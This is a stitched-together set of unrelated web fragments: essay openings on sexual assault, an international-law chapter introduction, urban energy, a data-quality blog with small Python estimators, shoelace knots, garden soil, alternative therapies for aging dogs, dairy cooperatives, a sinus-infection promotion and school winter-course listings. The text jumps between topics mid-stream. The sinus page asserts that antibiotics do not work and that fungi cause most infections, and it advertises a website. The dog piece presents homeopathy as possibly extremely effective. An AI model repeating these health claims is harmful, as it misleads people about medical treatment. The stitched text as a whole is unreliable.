Out”). Since this announcement many people across the country have begun to voice their opinions on the issue. Parents who shop at Target claim that this new bathroom policy is unsafe for their children and that it puts them at risk of assault. My question is: did sexual assault, rape, and molestation just now become a worrisome factor in these parents’ eyes? I hope not. If a sexual predator wanted to target your child, are the chances of that any higher after the policy change when every
Rape and sexual assault have been a growing epidemic not only in The United States, but all around the world as well. There are many stories based on these issues that also deal with something called date rape drugs. Rape, sexual assault, and date rape drugs are all very closely related and can all occur in the same situation. Date rape drugs can be used to lead to a sexual assault against someone and then possibly rape. These topics are all very serious because “There is an average of 207,754
comprehend the simple meaning of the word no. Reports of sexual assault are going through the roof because people do not understand that no means no. The main victims of sexual assault are women, and statistics show one in four women have experienced unwanted sexual contact. People come up with numerous excuses for blaming the woman for the experiences they face, which is wrong and makes women question themselves. Women who are sexually assaulted are judged by themselves and by our society
and Shields found that sexual assault rates are “3.1 to 4.4 times higher at the most permissive colleges and universities than their more restrictive counterparts”. The strict enforcement of alcohol bans can reduce sexual assault incidents. Socially regulated environments such as those found in religious schools do in fact keep the incidence of rape and sexual assault down. However, Richardson and Shields point out that this is not because these schools effectively condemned rape, but rather the restricted
Rapes and sexual assaults have increasingly become issues in our society, and society has become more aware of these types of crimes. For a long time, there was only rape; now the category is less broad than just that. Individuals, government bodies and schools have all decided to work, together and individually, on lessening the crime. Studies have revealed many shocking statistics that have pushed society to act against these crimes. Below, I will explain what exactly rape and sexual assault are, how they
INTRODUCTION
The International Law Commission (ILC or the Commission) has a mandate from the United Nations (UN) General Assembly (the UNGA or the General Assembly) to codify and progressively develop international law. During most of the ILC's history, the lion's share of its work product took the form of draft articles adopted by the UNGA as the basis for multilateral conventions. The ILC's activities received their principal legal effect during this period through the UN treaty-making process, rather than directly on the basis of the ILC's analysis of what customary international law (CIL or custom) does or should require.
In recent decades, however, the ILC has self-consciously limited its efforts to codify or progressively develop international law in the form of multilateral conventions. Instead, it has turned to other outputs – such as principles, conclusions, and draft articles, that it does not recommend be turned into treaties. Significantly, the Commission often claims that these outputs reflect CIL. For example, despite recommending that the General Assembly not base a treaty on the Draft Articles on State Responsibility, the ILC as well as many states and commentators assert that the draft articles largely reflect CIL.
This change in behavior presents a puzzle. If the ILC is still engaged in codification and progressive development, why has it changed the form of the work it produces? In this chapter, we argue that increasing political gridlock in the General Assembly – by which we mean a division of views over the substance of international norms and lack of enthusiasm for convening multilateral diplomatic conferences – has led the Commission to modify the form of its work to preserve its influence in shaping the evolution of international law. More specifically, we argue that the reduced likelihood of the General Assembly adopting draft articles as treaties closes off the primary mechanism of ILC influence. In addition, if the UNGA or member states reject an ILC recommendation that its draft articles become treaties, that rejection may suggest that the work product does not reflect existing custom – an alternative mechanism of ILC influence. To avoid these negative outcomes, we expect the ILC to turn to other outputs that allow it to continue to influence CIL without the General Assembly's approval.
Executive Summary
More than 50% of the global population already lives in urban settlements, and urban areas are projected to absorb almost all the global population growth to 2050, amounting to some additional three billion people. Over the next decades the increase in rural population in many developing countries will be overshadowed by population flows to cities. Rural populations globally are expected to peak at a level of 3.5 billion people by around 2020 and decline thereafter, albeit with heterogeneous regional trends. This adds urgency to addressing rural energy access, but our common future will be predominantly urban. Most urban growth will continue to occur in small- to medium-sized urban centers. Growth in these smaller cities poses serious policy challenges, especially in the developing world. In small cities, data and information to guide policy are largely absent, local resources to tackle development challenges are limited, and governance and institutional capacities are weak, requiring serious efforts in capacity building, novel applications of remote sensing, information, and decision support techniques, and new institutional partnerships. While ‘megacities’ with more than 10 million inhabitants have distinctive challenges, their contribution to global urban growth will remain comparatively small.
Energy-wise, the world is already predominantly urban. This assessment estimates that between 60–80% of final energy use globally is urban, with a central estimate of 75%. Applying national energy (or GHG inventory) reporting formats to the urban scale and to urban administrative boundaries is often referred to as a ‘production’ accounting approach and underlies the above GEA estimate.
How much does poor data quality cost your organization?
In the 6 weeks of my course, Data Quality Improvement at BCIT, I try to impart to my students an understanding of how to ‘discover’ the instances of poor data quality in the data sets they are responsible for, so that they can begin to help their teams ‘monetize’ the effects of that poor data quality. Each organization is different, so there are no out-of-the-box solutions that fit everyone; instead I show my students how to use specific tools and techniques to support the cost-benefit analyses behind enabling continuous improvement in data quality.
Joseph Juran, a pioneer of quality who defined quality as fitness for use and something that satisfies customer needs, said that:
“In the USA, about a third of what we do consists of redoing work previously ‘done’.”
Juran’s stark ‘one third’ statistic came from his understanding of the inefficiencies built into the average organization’s business processes, and to a large extent many of those inefficiencies can be reduced by process improvement methods such as Theory of Constraints, Lean and Six Sigma. Those same techniques, initially developed to improve manufacturers’ business processes, should also be considered for improving the ‘manufacture of data’ in today’s organizations. If you think about it, most organizations are not so much focused on the manufacture of widgets – rather they are focused on the management of decisions based on the data produced by their business processes.
Juran’s ‘one third’ statistic is congruent with the chapter on the costs of poor data quality in Larry English’s “Information Quality Applied”, where English details the statistical analyses illustrating that the costs of poor data quality are between 20% and 35% of the operating revenue of the average organization.
If the data produced by an organization’s business processes does not support its decision making, then its decisions will be sub-optimal. If the data can be cajoled into supporting the critical decisions but always has to be cleaned up, massaged and filtered before it is ‘safe for decision making’, then the organization is forced into an inefficient ‘data gathering and cleansing’ cycle that can build a dangerous time lag between when decisions should be made and when the data required to make them is finally clean enough to support them.
Here’s how you can estimate the cost of poor data quality in 5 simple steps.
IBM puts the cost of poor data quality in the USA at $3.1 trillion per year, which is roughly 15% of the USA’s GDP of $20 trillion. To paraphrase Everett Dirksen: “A trillion here, a trillion there, and pretty soon you’re talking about real money.”
So, it looks like the ball-park guesstimate for how much poor data quality is costing your company is between 15% and 35% of operating revenue, if your company is in the average range. Does that seem like a reasonable amount of money to waste? Is it reasonable to waste any money due to poor data quality? Jack Olson, in his book “Data Quality: The Accuracy Dimension”, says that roughly half of the costs due to poor data quality can be recovered or mitigated; the other half is irrecoverable due to the continuous evolution of data sets, interfaces and technologies at a local and industrial level. Olson’s book is the only one Ralph Kimball has reviewed on Amazon, and after giving it 5 out of 5, Kimball says, “This book is on my very short list of essential reading for data warehouse professionals.”
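Combining English's 20–35% operating-revenue range with Olson's rule of thumb that roughly half of the cost is recoverable gives a quick back-of-envelope estimator. A hedged sketch (the function name, integer-percentage defaults, and the example revenue figure are mine, not from either author):

```python
# Back-of-envelope cost of poor data quality: a percentage range of
# operating revenue, with a share of that cost treated as recoverable
# per Olson's rule of thumb.

def dq_cost_range(operating_revenue: float,
                  low_pct: int = 20, high_pct: int = 35,
                  recoverable_share: float = 0.5) -> dict:
    """Return the estimated cost band and its recoverable portion."""
    cost_low = operating_revenue * low_pct / 100
    cost_high = operating_revenue * high_pct / 100
    return {"cost_low": cost_low,
            "cost_high": cost_high,
            "recoverable_low": cost_low * recoverable_share,
            "recoverable_high": cost_high * recoverable_share}

est = dq_cost_range(10_000_000)  # e.g. a $10M-revenue organization
print(est["cost_low"], est["cost_high"])                # 2000000.0 3500000.0
print(est["recoverable_low"], est["recoverable_high"])  # 1000000.0 1750000.0
```

Even the low end of the band is a number worth putting in front of stakeholders.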
So, without sounding facetious, can I ask a simple question? If you have not been keeping metrics on the quality of data in your organization, should you consider publishing a note to advise your organization’s stakeholders and/or shareholders that, due to a lack of measurement, you do not know how much your poor data quality is costing them? That sounds extreme, doesn’t it? But we have all been hearing ideas about valuing an organization’s data and reporting it on a regular basis. It just might happen. Look at the perturbations caused by Europe’s General Data Protection Regulation (GDPR).
According to a March 2017 MIT Sloan article, many companies do not know the answer to the question “What is Your Data Worth?”, but it seems reasonable to assume that if the data is of poor quality, it is literally worth less than if it were pristine. And we should do everything we can to keep those two words ‘worth’ and ‘less’ from combining when an auditor assesses the value of our data!
Many people wonder why their shoelaces come untied all the time despite being tied in a tight knot. Researchers claim there is science behind it: the combination of foot stomping and leg swinging causes the laces to slip apart. That may sound obvious, but the scientists also give broader reasons to study knots. Knots are everywhere, from surgery to cable construction, and the kind of knot tied can define the strength of the knot.
Types Of Knots
Mechanical engineers point out that there are two ways to tie the bow-tie knot in shoelaces.
The weaker version is the granny knot: take a rope, cross both ends left over right, bring the left end under and out, and repeat. The stronger version is the square knot: instead of repeating the first step, finish the knot by crossing the right end over the left.
To analyse the mechanism, the researchers attached sensors to shoelace knots as study co-author Christine Gregg, a runner, walked and ran. They also repeatedly swung a pendulum arm with a shoelace attached, so that the forces a knot experiences could be analysed.
Coming Undone
Slow-motion videos of Gregg running on a treadmill showed that the granny knot held together for many strides, but once it loosened a little, it failed within another two strides. Intriguingly, the weak knot did not untie while Gregg’s leg was just swung back and forth, or when she stomped her foot on the ground, which meant that knot failure depends on both swing and stomp.
The sensors revealed that while running, the feet strike the ground with seven times the force of gravity, which helps cause the knots to untie. The researchers claim that the whipping motions of the free ends of the laces, caused by the swinging legs, make the laces slip. They also found that hanging weights on the laces makes them slip faster.
Why Study Knots?
Knots are not only present in shoelaces but also in your DNA. Researchers are now building microscopic structures made of DNA and other molecules, which can involve complex knots that are subject to a variety of forces. These complicated knotted structures are important to understand.
The scientists claim that in order to understand these structures, it is important to study knots and the reasons behind what makes them untie, and how. Building these complex and crucial structures makes studying knots mandatory. Daily Diamond claimed that further research might throw some light on why square knots are stronger than granny knots, and that computer simulations of how knots work would disentangle the complex role friction likely plays.
The success of any garden comes down to the quality and health of your soil. Like your plants, soil is a living thing that gets hungry, tired, and sick, and needs to be nurtured in order to function properly. But what exactly is soil? Basically, it's a mixture of water, rocks, and organic matter such as decaying leaves and insects. Naturally occurring in-ground soil may be sandy (made up of large rock particles), clayish (made up of small rock particles), or silty (particles intermediate in size between sand and clay). The soil that's considered the Holy Grail, however, is a mix of different-sized soil particles with loam, a nutrient-dense humus, added in. Loamy soil opens up heavy clay soil and allows oxygen, nutrients, and water to flow, and bulks up light sandy soils while also adding fertility.
Not sure what kind of soil you have? A simple "feel test" will give you a general idea. Take a tablespoon of soil, lightly wet it, then roll it into a ball. If the ball molds together, you have clay. If you can mold it but it then crumbles, you may have a combination of sand and clay. If no matter how much water you add it won't form a ball, you have sandy soil. The beauty is that once you know what you have, you can amend it. A key factor in successful gardening is knowing that different plants thrive in different types of soil. And different means of growing plants—say, in raised beds or pots—also dictate the type of soil you'll need.
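The feel test is essentially a small decision procedure, which can be written down directly. A sketch (the function and category names are illustrative, not horticultural terms of art):

```python
# The wet-ball "feel test" as a tiny decision procedure. The three
# outcomes follow the description in the text.

def feel_test(forms_ball: bool, crumbles_after: bool = False) -> str:
    """Classify soil from the result of rolling a wetted ball of it."""
    if not forms_ball:
        return "sandy"          # never holds a ball, however wet
    if crumbles_after:
        return "sand-clay mix"  # molds, then falls apart
    return "clay"               # holds its shape

print(feel_test(forms_ball=True))                       # clay
print(feel_test(forms_ball=True, crumbles_after=True))  # sand-clay mix
print(feel_test(forms_ball=False))                      # sandy
```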
Premixed and ready-to-use soils can take some of the guesswork out of what to purchase. Here's a look at some of the most popular varieties.
Potting Soil
This light, airy soil mix is specifically formulated for container gardening to provide adequate drainage and space for roots to grow. Just add it to pots and plant directly into it. You'll want to replace potting soil annually.
Soilless Mix
Soilless blends are perfect for starting delicate seeds. These super-light mixes are usually made of peat moss, perlite, and vermiculite and, as the name implies, do not contain organic matter that could harm or kill tender seedlings.
Raised Bed Mixes
Raised bed soil is used when filling a raised bed that exists on top of native soil. If your native soil is extra challenging, planting above ground can be the quickest and easiest path to success.
Cactus, Palm, and Citrus Mixes
Topsoil
Low-grade topsoil is good for filling and leveling holes but not formulated for planting. Higher-grade topsoil can be used to supplement less than ideal native soil.
Lawn Mix
This mix is primarily used for over-seeding and lawn repair. Most bagged lawn soil contains additives to increase water retention plus a starter fertilizer.
Compost/Manure
Organic matter is superb for adding to any soil type because it enriches and boosts fertility while releasing nutrients over an extended period of time, giving it a much longer-lasting impact than fast-acting chemical fertilizers. You can use compost as a mulch, then let the earthworms do the hard work of dragging it underground.
The global financial crisis continues to affect prospects for growth and poverty reduction in developing countries. As in previous economic crises, the impact varies between countries. This reflects differences in economic structures, historical legacies and policies, and in the resulting levels of vulnerability to economic shocks. There is, however, growing recognition of the importance of the governance and institutional set up of a country in responding effectively to financial crises and other similar shocks. What is perhaps less clear is how, in reality, these affect policy responses and their implementation. There is a lack of evidence on the incentives for more sustainable and effective reform processes, beyond the immediate crisis, and on the blockages that might prevent such reform.
These issues are key to understanding the dynamics underlying developing countries’ policy responses to economic shocks, and to informing both domestic and international priorities in this area. A political economy approach to the analysis of the role of state capacity and incentives to respond to economic shocks would help to fill these knowledge gaps. While more research is needed, this Project Briefing reviews the range of policy responses to the global financial crisis, as a first step. It sets out some useful frameworks and concepts to deepen our understanding of these issues, and to inform more effective assistance for countries affected by similar external shocks in the future.
#digital health
For all the transformative and life-saving benefits that 5G has to offer, a number of obstacles stand in the way of the NHS capitalising on the technology
Increases in life expectancy will put unprecedented pressure on our healthcare systems. Exploring the science of ageing and our understanding of co-morbidities will be crucial in tackling this ‘longevity trap’
A digital NHS promises widespread benefits for clinicians and patients, but only if personal data can be protected at a time of increasing cyberattacks
‘A clear vision for the system that filters down to local level is vital’
Regulation targeting fake medicines could speed up the adoption of technology in pharmacies
Better advice to people with diabetes could avoid serious medical complications, premature deaths and unsustainable costs to the NHS
A wide range of monitors for testing blood glucose levels, plus unequal access to them, results in sometimes uncertain self-management
There have been more advances in the field of medical devices and technology to help people with their type 1 diabetes treatments in the last five years than in the previous fifty
Gray muzzles. Cloudy eyes. Difficulty getting up from the floor or finding the tennis ball you just threw. Maybe even a few accidents from a thoroughly housetrained dog. These are all signs that your dog is aging — and that he or she needs you more than ever.
Aging, just as in humans, can bring a number of health concerns. "Like humans, aging dogs face arthritis and joint problems, often made worse by being overweight or obese. Their vision and hearing also worsen over time," says holistic veterinarian Dr. Babette Gladstein. No matter what the issues are, your senior dogs are depending on you in their golden years.
One of the most common issues in older dogs is arthritis.
If you notice that your dog is limping, walking with stiff joints, reluctant to do things that were previously easy, or licking, chewing, or biting at his legs, your dog may have arthritis. The first order of action is to schedule a vet visit.
Once you have a diagnosis, there will be several options available for treatment. Traditionally, non-steroidal anti-inflammatories, or NSAIDS, are prescribed for pain, but these can have serious side effects.
For those not wanting to risk any adverse reactions, there are other options. Alternative veterinary therapies are a fascinating mix of ancient treatments, such as acupuncture and Chinese herbal therapies with futuristic technological advances, such as laser therapy, ultrasound, prolotherapy, and electromagnetic field therapy. A combination of different types of treatments may be recommended.
Here is a breakdown of the most common alternative therapies and what you need to know about them.
1. Physical Therapy
“Physical therapy is often the first recommended form of treatment, which includes stretching the muscles and doing exercises that strengthen and improve their range of motion,” says Dr. Babette. “Many dogs can benefit greatly from regular physical therapy.”
Physical therapy includes massage and manipulative techniques (also known as chiropractic adjustments) to align the skeleton and the joints. This increases blood flow, relieves pressure on nerves, which subsequently alleviates pain. It also helps increase range of motion, which allows your dog to get around easier and more comfortably.
Physical manipulation can also improve the health of the body as a whole, improving cardiovascular function, digestion and respiratory function. By aligning the spinal column, pressure on nerves that regulate the body’s organs is released, restoring proper function and improving your dog’s overall health.
2. Acupuncture
"Acupuncture is a healing art that has been used in China for thousands of years to treat a variety of medical conditions," says Dr. Rachel Barrack, veterinarian and founder of the concierge practice Animal Acupuncture in New York City. "It is considered the mainstay of traditional Chinese medicine."
It is based on the idea that diseases and ailments are caused by energy blockage in the body. “Most acupuncture points are located along 14 major channels, which form a network that carries blood and energy throughout the entire body,” says Dr. Barrack.
The process involves acupuncturists inserting fine, sterile needles into points on the body to provide pain relief; stimulate the immune, endocrine, cardiovascular, digestive, and nervous systems; decrease inflammation and increase blood flow. This stimulation helps the body heal itself.
“Acupuncture produces a physiological response,” says Dr. Barrack. “It can also help restore balance between organ systems for optimal health and overall wellbeing. By decreasing inflammation, acupuncture alleviates discomfort associated with inflammatory conditions such as arthritis.”
3. Chinese Herbology
Chinese herbs are often used with acupuncture to help increase the effectiveness. Chinese herbal therapy is thousands of years old and uses medicinal plants that contain a vast variety of chemical compounds. Veterinarians practicing Chinese medicine may use as many as 50 herbs together to treat pain and discomfort resulting from age-related conditions.
Chinese herb therapy is designed to treat chronic conditions such as allergies, kidney and liver failure, skin and coat problems, along with behavioral problems like anxiety. These herbs come in several forms, including capsule, powder and tablet, that are easy to administer and to digest.
“Although cultivated from nature, Chinese herbs should always be thought of as medicine, and there is no ‘one-size-fits-all’ herbal formula for dogs with arthritis and other conditions,” says Dr. Barrack. “Herbs are prescribed depending on the individual needs of the patient.” But don’t try this on your own; always go to a vet certified in Chinese herbology.
4. Prolotherapy
Pioneered in sports medicine for the world’s elite human athletes, prolotherapy is an alternative orthopedic therapy that works rapidly to manage your aging dog’s pain and strengthen and stabilize the joints. “By administering controlled injections of natural proliferating agents, like dextrose mixed with lidocaine, into the damaged joint, it triggers a slight inflammatory response,” explains Dr. Babette. “Then the body’s natural healing mechanism kicks in, stimulating the formation of healthy new ligament and tendon tissues.”
5. Platelet Rich Plasma (PRP) and A-Cell
This regenerative technology can enhance the effects of prolotherapy. PRP, which consists of protein-rich platelets, and A-Cell, which consists of stem cell equivalents, can provide relief for a dog's hips and knees, increasing mobility and decreasing pain, says Dr. Babette. "The cell therapy uses your dog's own immune response to activate the same processes the body would normally use, but amplified many times over."
6. K-Laser Therapy
The K-Laser is a high-energy therapeutic laser, which is non-invasive, gentle, and extremely effective in healing stressed or damaged tissue, says Dr. Babette. "This naturally pain-free treatment can alleviate pain, reduce inflammation, and promote tissue growth. It has also been known to improve overall health and comfort for dogs."
During the process, the therapy is directed at the source of pain. It feels like a warm sensation but isn't painful, says Dr. Babette, who notes that many dogs fall asleep during the treatment. Using the laser may result in shorter recovery time, greater range of motion, and a decrease in muscle spasms.
7. Ultrasound Therapy
Ultrasound therapy uses high-energy sound waves applied directly to injured tissue to provide immediate relief and eventual healing. The area that’s damaged absorbs the sound energy and then radiates heat, which stimulates collagen fibers, accelerating tissue and tendon growth and improving strength. It can be used to treat a variety of conditions and injuries, including tendon and ligament injuries, muscular pain, scar tissue, and swelling.
8. Homeopathic Remedies
Homeopathic medicine uses natural substances to stimulate the body’s natural healing process. It is based on the belief that “like cures like,” or substances that would cause particular symptoms in large doses, may stimulate the body’s immune system when given in a very diluted dose. These remedies, derived from plant and animal materials and minerals, and prescribed to treat the individual dog, may be extremely effective.
“There are also some lifestyle modifications owners can make at home to best help their aging dog,” suggests Dr. Barrack. “Continue exercising to help your pet maintain a healthy body weight and to keep the joints fluid and flexible.”
Changing your dog’s diet to exclude any inflammatory ingredients, such as grains and corn, is also a vital step, says Dr. Babette. “Either homemade food or nutritionally rich dog food are the best to feed your aging pup. Supplements like turmeric, glucosamine and Adequan are also beneficial without any harsh side effects.” You can also look at CBD oil.
It’s always important to consult with a veterinarian. You can go to one certified in both Western and alternative therapies to help you decide which will benefit your senior dogs and keep them healthy and happy long into their golden years.
This primacy of production is even more pronounced in necessaries, particularly the most basic, like food and clothing. The producer of food will always need food; he is motivated to produce enough at least to ensure that he may eat. The consumer of food, on the other hand, is entirely dependent upon the producers of it. If the producers do not produce enough, or produce in too low a quality, the consumer dies. The same is true for a society as a whole: if that society fails to produce sufficient food, it must either import that food, compensating for that importation by some other valuable production, or simply go without, which clearly is not a viable option. Either way, it must produce rather than merely consume, and production is again seen to be primary; for without production, no consumption can occur. Which brings me to my present topic: the primacy of agriculture. By “agriculture” here I mean, very loosely, the production of food; it includes farming, gardening, animal husbandry, hunting, fishing, and anything else that results in some food product at the end. It’s clear from the foregoing that agriculture is the most necessary of all productive industries. Agriculture is the oldest and the greatest profession. Without a healthy agricultural base, all economies are doomed, for workers cannot work if they cannot eat. Before we worry about whether we’ve got enough motor vehicles, good enough highways, fast enough computers, and big enough office parks, we need to worry about whether we’ve got enough food. We take it entirely for granted these days, but we shouldn’t. It’s the bedrock of all human endeavor, the root of all human production. Without it, we can do nothing.
Without physical sustenance, no other work in a political community is possible. And yet, most Americans pay scant attention to what is required for food to be brought to their homes. In fact, many are content with the industrial system; they are just ignorant of the damage that it causes to the soil and to water systems and of the amount of energy required to keep it going.
Relocalization and sustainability require that more become farmers, but who is willing to do the work? How can we transform the major urban and suburban areas, and make farming more appealing and financially feasible? Would people be willing to pay more money for their food, when they can get it at lower prices from elsewhere, thanks to cheap gas?
Dairy farming in India is an "all season" business, and efficient management of a dairy farm is the key to success. In India, cow and buffalo farming are the backbone of the dairy industry. Karnataka Milk Federation (KMF) is the largest cooperative dairy federation in South India, owned and managed by the milk producers of Karnataka State. KMF has over 2.25 million milk producers in over 12,334 village-level Dairy Cooperative Societies, functioning under 13 District Cooperative Milk Unions in Karnataka State. The mission of the Federation is to usher in rural prosperity through dairy development. The study uses secondary information from the existing literature, such as relevant research from books and articles. The objectives of the study are to present an overview of KMF in Karnataka and to analyse its growth and development. Owing to a conducive climate and topography, the animal husbandry, dairying and fisheries sectors have played a prominent socio-economic role in India. They also play a significant role in generating gainful employment in the rural sector, particularly among the landless, small and marginal farmers, and in women's empowerment. KMF has played a pivotal role in strengthening the cooperative movement in the state since its inception.
ISRAELI EDUCATION MARKET
Date: 2016
Author: Awada, Saleh
Abstract
In the past 50 years, participation in the education system has increased, and the upgrading of the occupational structure as a result of industrialization processes has created, inter alia, a demand for a skilled, sophisticated, and highly educated labor force. Concurrently, educational qualifications have become an important requirement even for employment at the bottom of the occupational hierarchy. As most individuals in post-industrial societies attain secondary education, the proportion of occupations that require post-secondary education has grown, and is projected to continue growing. Although high-level credentials have become more important, there is relatively little research on the transition from higher education to work. This transition is usually conceptualized in terms of the labor market consequences of a very crude classification of vocational versus academic tracks in (mainly secondary) education. Few studies have explored labor market consequences using a detailed classification of tertiary education. In this article, we focus on two important aspects of tertiary education: the type of degree awarded and the field of study.
Sinus Infection - Cure Your Sinus Problems Naturally Now! - Sinus Nurse Reports!
In the U.S., millions of dollars are spent every year on antibiotics and other medications that promise to bring relief to people with sinus infections, but they don't work. Sinus infections and other sinus problems account for millions of visits to clinics every year. These infections are caused mostly by fungi, but also by bacteria and viruses. Sinusitis, or sinus infection, is one of the most common health complaints in the U.S. People are usually diagnosed after a review of the patient's history, a physical examination, and a discussion of symptoms; however, many people are fully aware they have one without ever visiting their doctor.
A common symptom that is usually, but not always, present if you have a sinus infection is yellowish mucous or phlegm. While green and clear mucous can be signs of other types of infections or problems, yellow mucous or sputum usually means the sinuses are infected. If you think you have a sinus infection, make sure to note the color of your sputum. The sinuses drain down into the throat, and you may feel a lump or something there from time to time. Sinusitis can also be a complication of an allergy. In people who have chronic sinusitis, the openings of the cavities are blocked and narrowed. Nasal secretions, debris, particles, and infectious material back up into one of the sets of sinus cavities, often leading to pain and pressure, though not always; because the infection is systemic, one may simply feel tired or lethargic. Your doctor may use a light to look into the sinuses that can be reached, checking for inflammation. If the light doesn't shine through, the sinuses are blocked. Not all the sinus cavities can be viewed this way, however. There are actually four sets of sinuses located behind your face and in your head.
The sinuses are air-filled cavities. In healthy people, there are nasal openings that drain debris and mucous out of the cavities and into the nose. Of the many symptoms that can be present in a sinus infection they can include a stuffy nose, which can run for ten days or more and often two weeks if it isn't taken care of properly, a runny nose with clear, often yellow or sometimes green mucus, sometimes fever, daytime cough - especially in the morning, a scratchy throat, smelly breath - found often in young children, sometimes a swelling around the eyes, sinus headaches (it used to be thought they were uncommon but not anymore) and facial pain.
If you have difficulty breathing and a cough together, these are usually symptoms of sinusitis or bronchitis. When sleeping at night, if you lie flat, your sinuses may drain into your lungs. Sometimes this can cause pneumonia. If you have a full-blown infection, it is better to sleep propped up with pillows. The treatment of sinus infections should aim to resolve the infection, reduce swelling, promote sinus drainage, prevent any serious complications such as pneumonia, meningitis, or brain abscess, and stop this process in its tracks. You may benefit from an air purifier if your sinus infections are allergy-related, if you live in a smoke-filled environment, or if they occur too often. Commonly used medical therapies, including saline nasal sprays, humidification, moisturization, and nasal irrigation, can be very effective for anyone suffering from chronic sinus infections. There are drug-free, effective sinus treatments today that are totally natural. My friends and family members and others who have suffered for years with sinus problems, sinus infections, and constantly running or stuffed noses no longer suffer today. Seek out these sinus cures, 'busters,' and natural treatments and get rid of your sinus problems forever. For more info on how I cured myself of chronic sinus infections, go to a nurse's website, http://www.Sinus-Solutions.com, for tips on sinus treatments, natural sinus treatments, causes, and remedies for all types, including info on symptoms, surgery, nasal irrigation, and sinus headaches.
Alternative medicine faculties teach health and medical disciplines that may be used instead of, or along with, standard medicine. Whereas complementary medicine is used alongside conventional medicine, alternative medicine is used in its place. Regulation and licensing of alternative medicine and health care providers varies between and within countries. Alternative therapies are often based on religion, tradition, superstition, belief in supernatural energies, pseudoscience, errors in reasoning, propaganda, fraud, or lies.
The authors compared their data with previous studies from the 1920s and 1930s and found that their curve lined up very closely with earlier data on expected survival in a group of women, all comers, with untreated breast cancer.
Examples of alternative medical systems that have developed in Western cultures include homeopathic medicine and naturopathic medicine. Bioelectromagnetic-based therapies involve the unconventional use of electromagnetic fields, such as pulsed fields, …
Winter Study
Winter Study Electives
During the winter term, Buxton offers an array of intensive six-week classes to further enrich students’ educational experience. These courses emphasize integrated learning, hands-on experience and team-teaching. Listed on this page are the 2019 Winter Study courses.
Students will be introduced to three disciplines: metal welding, automotive repair, and woodworking, alongside professionals who work in these fields. Mike St. Pierre will instruct woodworking, shop and power-tool use, and safety; Jacinda Deeley will introduce welding techniques for practical and sculptural applications with metal; Kevin Leonard of Flamingo Motors will oversee the disassembling of a car engine as a teaching tool, and cover basic car maintenance. There will be a writing component to this otherwise hands-on class, and students will be expected to keep a weekly journal.
Does the idea of growing up freak you out? Do you ever wonder how you’re going to manage everything that comes along with “being an adult”? Fear not! In this class, we will embrace the “unknown” and deliver on the question “why didn’t they teach us this in school?” Each class will focus on a particular skill or skill set, such as filing your taxes, reading a map, changing a tire, feeding yourself, etc. We’d like your input as well and plan to meet casually once everyone is assigned to Winter Study classes to work on the list together. Come learn some practical information that you will definitely use again at some point in your life!
Maximum # of students: 8
Together, we will research the rights of citizens, legal residents, and undocumented immigrants in the United States. Using our research, we will create an illustrated guide that clearly and simply explains what people’s rights are in different situations. If we have some advanced or fluent Spanish speakers in the class, we will also create a Spanish version! Copies of our illustrated guide will be made available in the Holyoke Public Library, in Holyoke Massachusetts. We may do a little bit of field research and surveying to find out what kinds of issues and situations are most pressing for people in the Holyoke community. Everyone will participate in the research process and collaborate to contribute to the final product, but your role may vary depending on whether you are more interested in writing, translating, or illustrating.
If there is one space on campus that seems underutilized, it is the barn lounge. This class will approach, and potentially follow through on, a design/build project aimed at reworking the lounge space in a way that will better serve that end of campus. Using a variety of design approaches and, if there is time, practical building techniques to fulfill our vision, we will rework that vital social space. We may even knock down a wall or two…
From early ballad operettas to raunchy burlesques, from exploitative minstrel shows to musical comedies and romances intended to build a sense of patriotism, from Yiddish musicals to the narrative musical of our time- musical theatre has reflected and shaped the development of American culture since the 1700s. Our current day examples mirror contemporary popular music (think “Hamilton,” “Dear Evan Hanson,” even “Rent” in the 90s)- but this has actually been a trend since the early 1900s, when popular songs were used as the score for musicals. In this class, we will learn about the history of American musical theatre. We’ll listen to, and think critically about, our favorite musical numbers. Most importantly, we’ll learn musical theatre performance skills, from singing to embodying a character on stage to interpreting the lyrics of a song. (Maybe we’ll even incorporate a dance number or two!) We’ll approach this class from the perspective of covering a rich array of American musical theatre through the decades, with at least two ensemble numbers and a number of solos and duets. This class will conclude in a musical review performed for the Buxton community. No performance experience is necessary!
In this class, students will work in their best heels to master stability, walking, and doing turns in heels. Once that is established, we will work on learning a few moves à la Afro-beat or RuPaul's Drag Race, with the goal of creating a routine AND simultaneously building self-confidence, self-awareness, and intuition. This class is offered in the spirit of getting us up and moving and feeling good about who we are. The only things required are a pair of heels that either fully cover the foot or have straps, and a willingness to be yourself, make mistakes, and feel good doing so. Class will take place in the theatre (on the stage, specifically).
This course offers an overview on language history and transformation. We will briefly explore the origin of language and dive into how languages change, mix, and interact with one another. We will focus on how and why Modern English became what it is today. In addition to exploring the history of language, the class will dedicate time to analyzing and debunking various language myths that pervade modern American society. Such myths include “Everyone Has an Accent Except Me”, “Italian is Beautiful, German is Ugly”, “Women speak too much”, etc. This class will involve readings from academic and non-academic sources. The course will also incorporate in-depth discussions, research, and a final project. Throughout the course we will watch a BBC documentary series on the history of English. You do not need to know a foreign language in order to take this class, though it can be quite helpful and illuminating.
Together we will design and build a high-quality escape room from scratch. From start to finish this will involve deciding on a theme, coming up with a story, developing a series of puzzles, and furnishing/finishing the room to fit the theme and include the puzzles. The ultimate goal is to create a commercial-grade escape room that is both challenging and doable for a group of people (while requiring the group to work together). If completed successfully, it can then be used to challenge other members of the Buxton community.
The goal of this course is to help students become more knowledgeable and able political actors. The course will cover multiple aspects of voting—different voting systems and possible reforms, gerrymandering, voter suppression, etc. It will also examine campaigns—how they are organized and run, how money is raised and spent, the software that helps identify what voters to contact (Geoffrey Feldman is a Buxton alum who has run numerous campaigns in Massachusetts and is interested in giving students an inside look). Once candidates are elected, we will look at how laws are written and passed and how citizens try to influence that process. We will examine the relative methods and effectiveness of lobbying, contacting representatives, giving money, internet activism and public protest. Geoffrey is trying to arrange for a few elected figures to visit the class and talk about their experiences. There will be a certain amount of outside reading and research expected for the class.
For hundreds of years, board games were static and unchanging artifacts of ancient design. These designs were uncritical and many times obtuse in their choices of rules and customs. Modern game development began to challenge these assumptions, and especially in the last 15 years games have developed revolutionary design elements. Cooperative games, simultaneous turns, group games, asymmetric games, and catch-up mechanics have changed the field radically. We will first try to define what a game actually is, and then begin to dive into the mechanics and aesthetic elements that make a gaming experience. We will analyze board games with a critical eye, understanding how each piece in a game contributes (or doesn't) to the final experience of playing that game, why certain pieces are necessary, and how they can be improved upon and combined. Our class time will consist, predominantly, of playing a game and then analyzing it afterwards and outside of class, with written analyses for each game session. Finally, we will work through exercises in improving current games and in making our own, with a final project to make a complete game using any mechanics or elements that students find most fun.
